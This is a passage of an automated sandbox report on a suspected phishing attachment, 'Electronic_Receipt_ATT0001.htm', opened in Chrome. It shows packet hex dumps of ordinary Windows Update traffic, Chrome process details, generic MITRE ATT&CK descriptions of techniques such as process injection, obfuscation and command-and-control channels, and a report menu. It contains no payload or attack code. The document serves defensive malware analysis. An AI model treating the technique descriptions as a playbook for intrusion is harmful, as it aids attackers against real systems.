2024-10-01 22:19:22 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-10-01 22:19:22 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49768	20.114.59.183	443

Timestamp	Bytes transferred	Direction	Data
2024-10-01 22:20:00 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=bgEgzuWRKtWggtf&MD=VvOF+Lpr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-10-01 22:20:01 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 65d844cd-84f1-4871-a7d4-c542b31b3627 MS-RequestId: 04a48494-323b-4b27-833e-153ad30dd270 MS-CV: tePk0dvI1EeqQEwT.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Tue, 01 Oct 2024 22:20:00 GMT Connection: close Content-Length: 30005
2024-10-01 22:20:01 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-10-01 22:20:01 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Target ID:	0
Start time:	18:19:02
Start date:	01/10/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Electronic_Receipt_ATT0001.htm"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	18:19:05
Start date:	01/10/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2504 --field-trial-handle=2016,i,16826850735177625839,11304651080124014247,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Electronic_Receipt_ATT0001.htm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 127

Chrome Cache Entry: 128

Chrome Cache Entry: 129

Chrome Cache Entry: 130

Chrome Cache Entry: 131

Chrome Cache Entry: 132

Chrome Cache Entry: 133

Chrome Cache Entry: 134

Chrome Cache Entry: 135

Chrome Cache Entry: 136

Chrome Cache Entry: 137

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Windows Analysis Report
Electronic_Receipt_ATT0001.htm